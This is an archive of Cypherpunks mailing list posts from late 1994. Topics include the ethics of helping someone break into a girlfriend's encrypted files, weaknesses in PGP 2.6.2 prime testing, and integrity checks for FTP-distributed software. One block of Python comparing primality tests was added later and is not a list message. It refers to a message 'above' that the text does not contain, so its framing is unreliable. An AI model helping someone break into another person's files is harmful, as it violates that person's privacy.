I'm many things besides "crypto non-challenged." I'm an individual and an individualist, not a cog with a particular static role in society, which is apparently the way you'd like it. If you ask me what the color of the sky is, I can say "39" if I want. > As soon as this list turns into a pile of bleeding heart > liberals, anxious to embroil themselves in the personal matters of > others, it has failed. Yeah, well it seems you were just as quick as the "bleeding heart liberals" to scold others and impose your personal (a-)morality. Typical. > I cannot believe that people on this list, those who claim to be > interested in the preservation of privacy, would support the proposition > that knowledge about the strength or weakness of a given system should be > surpressed. No one was suppressing anything or in any way attempting to stop the flow of information. They were just expressing their opinions. Just because _you_ were unhappy with those opinions, that's no reason to hurl accusations of censorship around. I can refuse to give help to anyone I don't feel like helping, and if I feel like giving him a piece of my mind in the process, that's my business and his. > I submit that the response should have been the same regardless of the > nature of the material. > > Which is it going to be? > > > 1> > > Q: "How do you attack X?" > A: "Y" > > or > > > 2> > > Q: "How do you attack X?" > A: "Realistically X should not be attacked, because to allow the > widespead lack of confidence in X will destroy society as we know it, and > anyhow it's nasty." Great, I've always wanted to be a simple input-output machine. Pseudo-individualist Republican rubbish... --Dave. 
From A5113643667 at attpls.net Tue Dec 27 07:57:06 1994 From: A5113643667 at attpls.net (Tom Jones) Date: Tue, 27 Dec 94 07:57:06 PST Subject: credit card charges Message-ID: <05D763C0> Peace @ bix.com has posted a Windows program mpj/public/pgcharge.zip to ftp.csn.org that will create an order with a credit card using X12 formats that will be signed and encrypted with PGP and then sent to a mailer. The posting asks for volunteers to serve as alpha testers for the program. Tom From nobody at jpunix.com Tue Dec 27 09:30:12 1994 From: nobody at jpunix.com (Anonymous) Date: Tue, 27 Dec 94 09:30:12 PST Subject: voice encryption for portable PCs Message-ID: <199412271729.LAA04661@jpunix.com> an109574 at anon.penet.fi wrote: > I fully expect Phil's voice encryption software to become the de facto > telephonic standard just as PGP became the Internet standard. Cogon's > Aquafone, while commendable, has the disadvantage of employing DES. > I presume Phil will select a more resilient conventional algorithm. I don't see any reason to believe that triple DES is less secure than other currently popular algorithms such as IDEA, although 3DES does require somewhat more processor power. From david.lloyd-jones at canrem.com Tue Dec 27 09:35:40 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Tue, 27 Dec 94 09:35:40 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <9412242216.AA21275@vail.tivoli.com> Message-ID: <60.18040.6525.0C1C5D08@canrem.com> DL+ > Bzzzt, Eric. The Constitution applies to the whole shootin' | > match. + > Congress, Executive, States, agencies, CIA, you name it. MM+I think you should read the Constitution more carefully. No doubt I should. No doubt everybody should. In the current discussion, though, what is it you think I've missed? -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Luxuriantly hand-crafted from only the finest ASCII. 
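Two threads on this page turn on how PGP finds its primes: Derek Atkins's explanation of the uneven key generation times (above) and Hadmut Danisch's description of slowtest() as Fermat tests to the bases 2, 3, 5 and 7 (the next message). The Python below is an added example, not PGP's code and not from any list member; it compares that four-base Fermat check with Miller-Rabin on the same bases and counts how many candidates a sequential search tries. The function names, the 100000 bound, the 256-bit size and the step-by-2 search are assumptions made for the illustration, and the small-prime sieve Danisch mentions is left out.

```python
"""Fermat (bases 2, 3, 5, 7) versus Miller-Rabin on the same bases."""
import random

BASES = (2, 3, 5, 7)  # the bases the thread attributes to slowtest()


def fermat_passes(n, bases=BASES):
    """True if a^(n-1) = 1 mod n for every base (prime or Fermat pseudoprime)."""
    if n < 2:
        return False
    if n in bases:
        return True
    return all(pow(a, n - 1, n) == 1 for a in bases)


def miller_rabin_passes(n, bases=BASES):
    """True if n is a strong probable prime to every base."""
    if n < 2:
        return False
    if n in bases:
        return True
    if n % 2 == 0:
        return False
    # Write n - 1 = d * 2^s with d odd.
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False  # this base is a witness that n is composite
    return True


def smallest_factor(n):
    """Smallest prime factor by trial division (ground truth for small n)."""
    f = 2
    while f * f <= n:
        if n % f == 0:
            return f
        f += 1
    return n


def fermat_fooled_below(limit):
    """Odd composites below `limit` that pass all four Fermat tests."""
    return [n for n in range(9, limit, 2)
            if fermat_passes(n) and smallest_factor(n) != n]


def candidates_tried(bits, rng):
    """Candidates tested, stepping by 2 from a random odd start (assumed
    search order), until one passes Miller-Rabin."""
    n = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
    tried = 1
    while not miller_rabin_passes(n):
        n += 2
        tried += 1
    return tried


if __name__ == "__main__":
    fooled = fermat_fooled_below(100_000)
    print("composites passing Fermat to 2,3,5,7:", fooled)
    print("of those, passing Miller-Rabin:",
          [n for n in fooled if miller_rabin_passes(n)])
    rng = random.Random(1994)  # fixed seed so the run is repeatable
    print("candidates tried per 256-bit prime:",
          [candidates_tried(256, rng) for _ in range(10)])
```

29341 = 13 * 37 * 61 is a Carmichael number, so it passes the Fermat test to every base coprime to it, while base 3 exposes it under Miller-Rabin; the smallest composite that passes Miller-Rabin to all of 2, 3, 5 and 7 is 3215031751.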
From danisch at ira.uka.de Tue Dec 27 11:41:22 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 27 Dec 94 11:41:22 PST
Subject: Are 2048-bit pgp keys really secure ?
Message-ID: <9412271941.AA19596@elysion.iaks.ira.uka.de>

-----BEGIN PGP SIGNED MESSAGE-----

A 2048-bit pgp key ( n=p*q somewhere around 2^2048, p and q somewhere around 2^1024) is only as secure as it looks like, if both p and q are prime numbers.

In fact p and q are only pseudo prime numbers, they are not proven to be prime numbers. It is known only that they have a high probability to be prime numbers.

Usually a candidate number is sent through a probabilistic prime test which says either "No, not a prime" or "a prime with a probability of at least 50% ". Usually this test is repeated 10 or 20 times, so after passing this iteration the probability of having a prime number is at least 1:2^10 or 1:2^20 .

Would such a test be sufficient for generating 1024-bit prime numbers? Does it make sense to use pseudo-prime-numbers with a low probability of 1:2^10 only to generate a rsa key with a 2048 bit n ?

Now have a look at pgp2.6.2: In genprime.c the prime numbers are generated. After testing the candidates with a table of small primes, they are passed to slowtest().

[Read slowtest and its comment...]

slowtest() does not do one of the usual primality tests. It just passes the candidate through a Fermat test. Only four (4!) passes are done. The comment of slowtest() gives a probability of 10^-44 to fail for a number of about 512 bit.

If this is true ( 10^-44 ~ 2^-146 ), about one of 10^44 keys is weak. This shouldn't be a problem, 10^44 is quite big. But at the moment I can't follow the arguments, why 4 Fermat tests should be enough to find good (pseudo-)primes. I can't see a reason why the iteration should already be stopped after the 4th loop. Generating a key should be worth to wait some minutes longer, especially when this doesn't need interactive work.

I am also not convinced yet of the Fermat test. Why not use a Rabin-Miller-Test ?

I have read only a very small piece of the pgp code yet, but if I understand the code of slowtest well (correct me if not...) the command mp_init(x, primetable[i]) for i=0,1,2,3 sets mpi x to the values 2,3,5,7 .

If I understood this well, the slowtest() is nothing more than testing for a given p whether

   2^(p-1) = 1 mod p
   3^(p-1) = 1 mod p
   5^(p-1) = 1 mod p
   7^(p-1) = 1 mod p

Any comments?

BTW: The comment of slowtest() references "Finding Four Million Large Random Primes", by Ronald Rivest, in Advances in Cryptology: Proceedings of Crypto '91.

I have the "Advances in Cryptology - Crypto '91, Proceedings", Lecture Notes in Computer Science, 576, Springer, here. Call me blind or stupid, but I can't find the referenced Article. Neither the Title in the contents, nor R. Rivest in the Author Index.

Can anybody tell me where to find the referenced Article ?

Hadmut Danisch

BTW 2: pgp2.6.2 doesn't work well if a key identified by its keyid is keychecked ( pgp -kc 0x... ). It stops after the first signature with a signator's key shorter than the signed/checked key, because the global precision is changed and not changed back for testing the signature.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From eric at remailer.net Tue Dec 27 12:06:18 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 12:06:18 PST
Subject: Are 2048-bit pgp keys really secure ?
In-Reply-To: <9412271941.AA19596@elysion.iaks.ira.uka.de>
Message-ID: <199412272106.NAA01249@largo.remailer.net>

   From: danisch at ira.uka.de (Hadmut Danisch)

   Usually a candidate number is sent through a probabilistic prime test which says either "No, not a prime" or "a prime with a probability of at least 50% ". Usually this test is repeated 10 or 20 times, so after passing this iteration the probability of having a prime number is at least 1:2^10 or 1:2^20 .

The probability of a composite passing one trial is extremely small, much smaller than 50%. _And_ the trials with different moduli are _not_ independent, so you just can't multiply the probabilities together. Rather, you have to calculate a chain of conditional probabilities.

There was a paper in the last seven or eight years on this. I believe Pomerance was one of the authors. Ask on sci.crypt for details.

   I am also not convinced yet of the Fermat test. Why not use a Rabin-Miller-Test ?

Rabin-Miller would be better. It would be instructive to examine the conditional probability that a composite number which fails Rabin-Miller passes Fermat. I understand it's vanishingly small.

Eric

From cjl at welchlink.welch.jhu.edu Tue Dec 27 14:41:11 1994
From: cjl at welchlink.welch.jhu.edu (cjl)
Date: Tue, 27 Dec 94 14:41:11 PST
Subject: swIPe pointer please
Message-ID:

I need a pointer to swIPe info and preferably an FTP site.

Responses to me by E-mail please.

C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / )

From perry at imsi.com Tue Dec 27 14:46:46 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 27 Dec 94 14:46:46 PST
Subject: swIPe pointer please
In-Reply-To:
Message-ID: <9412272246.AA03324@snark.imsi.com>

There is stuff on ftp.csua.berkeley.edu; I'll warn you that swIPe is creaking badly and will probably be updated Real Soon Now.
Perry cjl says: > > I need a pointer to swIPe info and preferably an FTP site. > > Responses to me by E-mail please. > > C. J. Leonard ( / "DNA is groovy" > \ / - Watson & Crick > / \ <-- major groove > ( \ > Finger for public key \ ) > Strong-arm for secret key / <-- minor groove > Thumb-screws for pass-phrase / ) > From merriman at metronet.com Tue Dec 27 15:31:11 1994 From: merriman at metronet.com (David K. Merriman) Date: Tue, 27 Dec 94 15:31:11 PST Subject: Comdex Disks? Message-ID: <199412272331.AA09920@metronet.com> Sorry to divert everyone from the other threads, but I happen to have some somewhat crypto-related question: Back some time ago, there was some discussion of giving away disks at Comdex in NY; by any chance, does anyone have a copy of the contents of what was on those disks? I'd like to be able to give away 'basic info' in easy-to-handle format :-) Thank for any help/pointers. We return you now to your regular mailing list..... Dave Merriman - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at fohnix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From rah at shipwright.com Tue Dec 27 15:43:49 1994 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 27 Dec 94 15:43:49 PST Subject: Breaking into girlfriend's files Message-ID: Psst! Is Tim here? What? He's on vacation? Cool. Ahem. > := At 9:52 AM 12/27/94, dmandl at bear.com >> := Black Unicorn dmandl> No one was suppressing anything or in any way attempting to stop the flow dmandl> of information. They were just expressing their opinions. Just because dmandl> _you_ were unhappy with those opinions, that's no reason to hurl accusations dmandl> of censorship around. 
dmandl> dmandl> I can refuse to give help to anyone I don't feel like helping, and if I feel dmandl> like giving him a piece of my mind in the process, that's my business and his. unicorn>> Q: "How do you attack X?" unicorn>> A: "Realistically X should not be attacked, because to allow the unicorn>> widespread lack of confidence in X will destroy society as we know it, and unicorn>> anyhow it's nasty." dmandl> Great, I've always wanted to be a simple input-output machine. dmandl> dmandl> Pseudo-individualist Republican rubbish... As a pedigreed piece of Pseudo-individualist Republican rubbish (PIRR) myself, I take exception to that remark. Associating noble PIRR with pseudonyms named for inappropriately-colored fictional creatures really gets my, ahem, goat. It seems to me the proper answer to the original poster of this thread was to greet it with a deafening silence. First, because the answer is trivial given the technical level of this list (well, the average technical level, anyway) and can be obtained elsewhere. Second, because there is such a diversity of ethics, politics, and moral belief on this list, because the fundamental nature of the technology we discuss here and its potential impact on human society is so great, to address the question on its merits would unleash enough verbal flatulence (including my own, I'm afraid) to rival even the best Mel Brooks epic. To employ an appropriately PIRR sports metaphor, the question was a pitch so *obviously* a slow lob over the plate, such an *easy* target for flamage, that it should have been very apparent to anybody here that it wouldn't have been fair at all to the pitcher to even swing at it. Short of letting it fall into the mitt with a dull thud, a pointer to the appropriate HAKK3r d00d list would have been the next best thing. This was done. Next on the list would be actually answering the question as quickly as possible. This was done. (Thank you, Perry.)
The querent will probably not be able to execute the proper solution anyway. He'll probably run out of steam before executing it, and if he does it anyway, he deserves all the shit he'll find himself in upon decrypting those files.

We were all young and stupid once. Some of us still are, it appears.

The posting was inadvertent flamebait, yes? Let the rubble bounce already.

Can we take the rest of the discussion off-line now?

Cheers,
Bob Hettinga

P.S. My apologies to M(s)r. 'Corn if I stepped on he/she/it's er, hooves. I meant to cast no asparagas upon he/she/it's choice of nym-name.

-----------------
Robert Hettinga (rah at shipwright.com)   "There is no difference between someone
Shipwright Development Corporation       who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                     snakes." -- Bertrand Russell
(617) 323-7923

From merriman at metronet.com Tue Dec 27 16:04:21 1994
From: merriman at metronet.com (David K. Merriman)
Date: Tue, 27 Dec 94 16:04:21 PST
Subject: Comdex Disks?
Message-ID: <199412280004.AA15066@metronet.com>

>
>David K. Merriman says:
>> Back some time ago, there was some discussion of giving away disks at Comdex
>> in NY;
>
>Comdex isn't held in New York.

Fine. Whatever the hell the damn expo-thingy that was held in New York sometime in the April/May timeframe.

Dave Merriman
- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable."
John F. Kennedy

From ianf at sydney.sgi.com Tue Dec 27 16:10:36 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 16:10:36 PST
Subject: Breaking into girlfriend's files
In-Reply-To: <199412230045.TAA21904@thor.cs.umass.edu>
Message-ID: <9412281058.ZM10837@wiley.sydney.sgi.com>

On Dec 23, 1:11am, Mark Terka wrote:
> Oh goody!
> Now we are getting a judgement call with respect to how cryptography
> in general aids "the greater good".

Please indicate where I said or implied this.

Possibly there is such a thing as the "greater good", but I have seen it used too many times to justify the applications of someone's personal beliefs or (more commonly) phobias and personal problems to the world at large. It's not a concept I have a lot of respect for, purely on this basis.

Personally - and let's face it, none of us can express much more than a personal opinion - I think the best that any of us can do is to base our decisions on individual cases, which seems to have been what has happened in this case.

> Do you suppose the NSA makes the same call when they do routine traffic
> analysis or try to bust a suspiciously (to them) encrypted message??????

No I don't. On the other hand, I am sure that a whole load of judgement calls go into the selection of individuals or subjects which go onto watchlists.

> That to me indicates that the members of this list should be at least
> remotely interested in the subject of attacks as well as defense as you
> can't defend against something unless the method of attack has been discussed.

Agreed. But that doesn't mean that the way you go around investigating attacks on protocols and cryptosystems is to help a fairly pathetic individual violate someone else's privacy. To me, that just doesn't follow.

> GROAN! (again) And how, pray tell, do we go about protecting ourselves
> against others if we are not prepared to discuss what sort of attacks
> may be mounted against us?????

I never said we should not discuss it. But I do say that IN MY OPINION the original poster who wanted help was a pathetic little slime, and that IN MY OPINION, shouldn't be assisted to do anything. Generic attacks on Norton's Encrypt are "valid" subjects for cypherpunks discussion, which I would have thought goes without saying.
An even better outcome would be to provide the girlfriend with some indication of the true security against attack she is getting from the program, and to replace it with something better if it turns out to be inadequate.

> Like I alluded to before, I bet if it was a case of someone trying to
> descramble something like skipjack to try and discover something about
> National Security (ours OR theirs) I bet the members of this list
> would have fallen all over themselves trying to help the original poster.

I suppose that would depend on what the individuals concerned perceived as the consequences of their action.

> I don't recall seeing too much in the way of condemnation of the guy that
> posted RC4 to this list ..... but as soon as we see something that touches
> close to home like male/female relationships, the shit hits the fan!!!!!

So?

Based on past conversations and discussions, many of us are here because we don't like the idea of organisations or individuals being able to arbitrarily violate our own privacy. Speaking for myself, I know that I have had my privacy violated on a couple of occasions, and have become convinced that technical solutions are the way to go about it. But it does not follow that I should help someone violate another's privacy.

It seems that some people feel that their own privacy is inviolate, yet others are fair game.

> >Possibly. IMO, what the original requester was asking for was so
> >repulsive and immature that the responses so far have been mild.
> And in my opinion what the original poster was no different than the British
> attack on "Enigma" or the American attack on "Purple".

Well, wartime attacks like these are usually motivated by the belief that a lot of people's lives depend on the success of the venture. Whether this is true or not is debatable, and the lives in question are usually on one side only. I personally do not find the comparison to be valid.

Ian.
#include

From storm at marlin.ssnet.com Tue Dec 27 16:14:46 1994
From: storm at marlin.ssnet.com (Don Melvin)
Date: Tue, 27 Dec 94 16:14:46 PST
Subject: Looking for PGE
Message-ID: <9412280011.AA28136@marlin.ssnet.com>

Someone recently posted a list of steganography files. I've managed to l\o\s\e\secure that information and can't f\i\n\d\access it.

Does anyone have a pointer to PGE (Pretty Good Envelop) or a recommendation for another program for MSDos?

Thanks!

--
America - a country so rich and so strong we can reward the lazy and
punish the productive and still survive (so far)

Don Melvin storm at ssnet.com finger for PGP key.

From wcs at anchor.ho.att.com Tue Dec 27 16:17:16 1994
From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 27 Dec 94 16:17:16 PST
Subject: Making sure a program gets to the receiver intact
Message-ID: <9412280015.AA22592@anchor.ho.att.com>

Eric writes:
> From: an169306 at anon.penet.fi
> How can I insure a program, once put on FTP sites stays untampered with?
>
> The best solution is not digital signatures but rather digital
> timestamping. The question is not persistence of authorship but
> rather persistence through time.
> [Discussion of the implications of getting your keys hacked, over time]

Some good points, but on the whole I'll disagree. Either way, the solution pretty much comes down to "eternal vigilance"....

The interesting technique that digital timestamping provides is that it lets you show that the version you claim you posted to the ftp site got there before the [different] version that's there now. To use that technique, either you need to broadcast the details of the digital timestamping in an unhackable public fashion, or else someone who wants to validate the archived data needs to check with you to be sure that they have a good checksum matching your timestamp.
An ftp server *could* timestamp each incoming document, keeping the master timestamp data in an un-hackable location, and post the current timestamps for the current time period [e.g. day] in the (hackable) archive, and then register the day's timestamp file with a notary service so you can be sure that the file hasn't been compromised later.

On the other hand, without signatures, it's not too hard for a Bad Guy to store bogus files on the server and get them timestamped too - the user needs a good way to check for previous editions of the document in the timestamp file. With digital signatures, at least a given file has some internal consistency.

> The holes:
> 1: Someone hacking the keyservers, substituting a key for all the people
> who signed, and modifying the archive to show that.

That's why keyservers are inherently non-trustable; the trust comes from the Web of Trust connections you have, though a keyserver run by a widely-trusted person carrying only keys signed by him/her/it is stronger.

> 2: Someone breaking into my apt, sticking a keyboard monitor on, getting
> my passphrase and key.

Yup. That's a problem with signatures.

Bill

From ianf at sydney.sgi.com Tue Dec 27 16:23:06 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 16:23:06 PST
Subject: Breaking into girlfriend's files
In-Reply-To:
Message-ID: <9412281117.ZM10874@wiley.sydney.sgi.com>

On Dec 23, 11:28pm, Black Unicorn wrote:
> > What a load of amoral rubbish.
> By who's standard? Yours?

Of course. Whose are you speaking for, if not your own?

> > Cypherpunks is a group whose members believe in the application of
> > technology to PROTECT privacy, not to violate someone else's.
> > Once you assume that capability implies right, you're on very
> > shaky moral ground, but that is exactly what you are saying in this
> > post. I find that position repellent, and I would be very surprised
> > and not a little disappointed if you find many others here who felt
> > the same way.
> Who the hell are you to define the position of cypherpunks?
> Who the hell are any of us to do this?

I agree. I thought that it was rather obvious that all of us are speaking for ourselves. My statement of position was based on my perception of the original list statement of intent, and the discussion I have seen over the last six months.

> I guess I suffered from the silly idea that as a whole, the members of
> the list would not put short term morality before the long term goal.

Possibly you did, although I question whether the two are incompatible.

> It seems there are those who disagree with me. I would offer the
> following: While it may be that Joe Break-Into-Girlfriend's-Files may or
> may not be justified, that is not ours to judge.

Rubbish. Nor do you seem particularly backwards at being judgemental, or are you applying a different standard to the issue of what is right and wrong to discuss as you are to the original discussion?

> I cannot believe that people on this list, those who claim to be
> interested in the preservation of privacy, would support the proposition
> that knowledge about the strength or weakness of a given system should be
> suppressed.

I don't recall anyone who did mention censorship. I saw a lot of people suggesting that helping the original pathetic individual was not a good idea, and then several howls of outrage accusing these people of censorship. There is a difference between non-disclosure and censorship, and it's not an arbitrary one either.

> Disgusting. Get off this list, you belong on alt.codependency.recovery,
> or alt.bleeding.liberal.

But isn't that exactly what you're proposing? "Get off the list because your position disagrees with mine." Sounds like censorship to me, except that "Black Unicorn" is the one deciding what is acceptable.

Ian.
#include

From mab at crypto.com Tue Dec 27 16:45:01 1994
From: mab at crypto.com (Matt Blaze)
Date: Tue, 27 Dec 94 16:45:01 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To: <9412280015.AA22592@anchor.ho.att.com>
Message-ID: <199412280046.TAA26043@crypto.com>

Bill Stewart writes:
>> How can I insure a program, once put on FTP sites stays untampered with?
...
>On the other hand, without signatures, it's not too hard for a Bad Guy
>to store bogus files on the server and get them timestamped too -
>the user needs a good way to check for previous editions of the
>document in the timestamp file. With digital signatures,
>at least a given file has some internal consistency.
>
>> The holes:
>> 1: Someone hacking the keyservers, substituting a key for all the people
>> who signed, and modifying the archive to show that.
>That's why keyservers are inherently non-trustable; the trust comes from
>the Web of Trust connections you have, though a keyserver run by a
>widely-trusted person carrying only keys signed by him/her/it is stronger.
>
>> 2: Someone breaking into my apt, sticking a keyboard monitor on, getting
>> my passphrase and key.
>Yup. That's a problem with signatures.
>

Another, practical, problem with integrity checks (both signatures and timestamps) for files on public archive servers is that the receiver has to expect them and know how to verify them. Current ftp and www clients certainly don't have facilities to do this automatically, and neither do users have reason to suspect foul play if a timestamp or signature is missing for some file.

It's somewhat analogous to the situation ten years ago when some nut was lacing over-the-counter drugs with poison and putting the packages back on the shelf. The major drug companies responded by including tamper-evident seals on their packages, but until consumers learned to expect the seals, all the bad guys had to do was remove the seal entirely before replacing the tainted packages.
In the short term, given today's infrastructure, there's not a lot you can do.

Of course, in the medium- and long- term, the best solution is to design good schemes and deploy them widely enough that people learn to expect them.

-matt

From nesta at nesta.pr.mcs.net Tue Dec 27 17:02:35 1994
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Tue, 27 Dec 94 17:02:35 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To: <199412280046.TAA26043@crypto.com>
Message-ID:

On Tue, 27 Dec 1994, Matt Blaze wrote:
> including tamper-evident seals on their packages, but until consumers
> learned to expect the seals, all the bad guys had to do was remove
> the seal entirely before replacing the tainted packages. In the short
> term, given today's infrastructure, there's not a lot you can do.
>
> Of course, in the medium- and long- term, the best solution is to
> design good schemes and deploy them widely enough that people learn
> to expect them.
>

One solution, or start of a solution, is to tell the user about the signature checks, and how to go about verifying them in the README text file, that most users come to expect in a package of software. Or perhaps add into the tar and zipped package a file called SIGNATURECHECK or something suitably obvious, as well as explaining it. I believe most users expect the README file enough to look in it, at least skimming it.

i want to know everything               http://www.mcs.com/~nesta/home.html
i want to be everywhere                 Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters     /-/ a s t e zine

From perry at imsi.com Tue Dec 27 17:08:27 1994
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 27 Dec 94 17:08:27 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To:
Message-ID: <9412280107.AA03553@snark.imsi.com>

Nesta Stubbs says:
> One solution, or start of a solution, is to tell the user about the
> signature checks, and how to go about verifying them in the README text
> file, that most users come to expect in a package of software.

And if someone edits that out of the README?

.pm

From nesta at nesta.pr.mcs.net Tue Dec 27 17:18:23 1994
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Tue, 27 Dec 94 17:18:23 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To: <9412280107.AA03553@snark.imsi.com>
Message-ID:

On Tue, 27 Dec 1994, Perry E. Metzger wrote:
>
> Nesta Stubbs says:
> > One solution, or start of a solution, is to tell the user about the
> > signature checks, and how to go about verifying them in the README text
> > file, that most users come to expect in a package of software.
>
> And if someone edits that out of the README?

Put it in the file that pops up from the FTP server when you switch to that directory, am not sure what the file is called, but like when you switch to the pub/Linux directory on sunsite, it gives you a rundown of what Linux is and all. Then the person would have to hack access to the FTP server to change that. And I assume it is easier for the maintainer of the FTP site to keep track of that one readme, than it is to keep track of the readmes in all the packages.
i want to know everything               http://www.mcs.com/~nesta/home.html
i want to be everywhere                 Nesta's Home Page
i want to fuck everyone in the world &
i want to do something that matters     /-/ a s t e zine

From ianf at sydney.sgi.com Tue Dec 27 17:39:30 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 17:39:30 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To:
Message-ID: <9412281230.ZM11016@wiley.sydney.sgi.com>

On Dec 27, 7:14pm, Nesta Stubbs wrote:
> put it in the file that pops up from the FTP server when you switch to
> that directory, am not sure what the file is called, but like when you
> switch to the pub/Linux directory on sunsite, it gives you a rundown of
> what Linux is and all.

The ftpd's that implement the directory-change messages is not a standard one, and that functionality has been added to the servers which support it (possibly Linux ships with wuftpd, but no commercial version of Unix I know does.) The extended servers are very widely available, and although they do make ftp so much nicer to administer, they are not as widely deployed as I would have expected by now.

Ian.

From ianf at sydney.sgi.com Tue Dec 27 18:08:12 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Tue, 27 Dec 94 18:08:12 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <9412232039.AA03986@merckx.info.att.com>
Message-ID: <9412281256.ZM11042@wiley.sydney.sgi.com>

On Dec 23, 3:39pm, Matt Blaze wrote:
> essential services for me like taking backups. This means that, no
> matter how hard I try, it's impossible for me to be sure that none of
> my files have been tampered with.

Some time ago I looked at tripwire, and wondered if a personal version could be produced which would allow a similar function to be performed on a system which had a hostile sysadmin (a position I was in a few years ago, and it's not pleasant).
The problem is that although you can protect the data file of hashes (by using a pass phrase to encrypt it), protecting the binary which does the checking is rather more difficult. Sure, you can checksum it and lock that checksum in the encoded file, but a hostile attacker could make the self-check a special case which always returns good, and then snaffle the pass phrase. Once they had the pass phrase, the protection is dead.

Over lunch (ie. warning, not a lot of thought given to this :), I wondered if you could do something like this:

Have a simple bootstrap loader, and the encrypted main program. The bootstrap loader asks for the pass phrase, and decrypts the main program and runs it. The main program checks the loader for modification, and if there is a problem, refuses to go further with an indication to the original account owner (eg. overwrite the main program with one which simply prints "Main prog hacked at ". If all is well, the main program asks for a further pass phrase to the data file, and goes off to check all of the files in the listed areas (for the moment, the details of how it does that is not particularly relevant - all I am concerned about in this post is the protection of the binary).

Obvious Attacks:

1. Attack the main program. You can't, because it is encrypted (presumably with some sort of hash in there too), and so you can only trash it.

2. Attack the loader. This is possible, because it is in plaintext form. Dangers:

   a. The attacker may get your pass phrase. However, when the main program then sums the original loader, it will notice that it had changed and won't go further. Your pass phrase for the main program has been compromised, but the data file remains ok.

   b. The attacker may get a copy of the main program. That's fine, because the main program won't run (see above), and the user will be warned.

   c. (The main danger).
      The loader program loads the main program, but before copying itself back it replaces the trojan version with the original image (possibly even resetting the timestamp on the file). This is a problem.

3. Attack the datafile. Same as (1), really.

4. Attack the running image.

Both 2(c) and 4 are the main problems. Using gcore or procfs the malicious system admin can grab a running copy of the binary, and do what they like. There are many tricks to avoiding the danger of 4 (which applies to all crypto code running on hostile systems), but all are just that: tricks. They can be overcome given enough time and motivation. But 2(c) is the hassle, as there is no obvious way around this, and it is quite easy to do.

Anyone got any good ideas? I have a lurking suspicion that there are no solutions to this problem, and we're down to the same issue of securing the transport system which delivers a binary (which is not possible in this case).

Just an interesting diversion over a very boring lunch....

Ian.

From eric at remailer.net Tue Dec 27 18:38:02 1994
From: eric at remailer.net (Eric Hughes)
Date: Tue, 27 Dec 94 18:38:02 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To: <9412280015.AA22592@anchor.ho.att.com>
Message-ID: <199412280237.SAA02055@largo.remailer.net>

   From: wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204)

The specific question is tampering of files on archive sites. The larger issue is information, particularly software, distribution. My position is that timestamping is a better solution than signatures for the tampering issue and that both are useful for the larger issue.

   Some good points, but on the whole I'll disagree. Either way, the
   solution pretty much comes down to "eternal vigilance"....

Well, "eternal vigilance" is really "public information". Both the timestamping problem and the signature problem resolve down the same problem about secure _cleartext_ transmission.
How do people gain an assurance that they have the same shared piece of information?

The first advantage that timestamping has over signatures is that timestamps are temporal and signatures are not. Private keys for signatures change over time by design, but timestamp roots do not, also by design. That is, once a timestamp root has been securely transmitted, there is an assurance that everything up to that point is OK. Spoofing a signature, however, can be done by spoofing a key change; there are public information solutions to this as well, but they still do not have temporal assurances.

The second advantage is that the timestamp roots are more widely shared than individual public keys. Because more people look at this one piece of information, it's much harder to completely forge. The cost of verification is smaller per person, but there is much more total verification performed.

The root keys in a certification hierarchy have the same property of wide sharing, but the effect on public key distribution is not the same. The creation of the timestamp root is a _technically_ linkage of all the individual timestamps, while the root key of a certifying authority creates _social_ links between the root key and the other keys. The technical linkage is stronger.

   The interesting technique that digital timestamping provides is
   that it lets you show that the version you claim you posted to the
   ftp site got there before the [different] version that's there now.

You can also post a public announcement, timestamped, which has the location and the timestamp of the information and the archive. This public announcement has public information properties as above.

   To use that technique, either you need to broadcast the details of
   the digital timestamping in an unhackable public fashion,

The "unhackable" nature is not even necessary to assume. All you need is the ability to post public information with some non-zero probability of success. Eventually the public information gets out.
The timestamp will indicate priority.

There's also the possibility of timestamping the entire directory tree periodically. This is all publicly verifiable, so an interposer would have to intercept the very first transmission and could not come along later and perform undetectable corruption.

   On the other hand, without signatures, it's not too hard for a Bad
   Guy to store bogus files on the server and get them timestamped too -

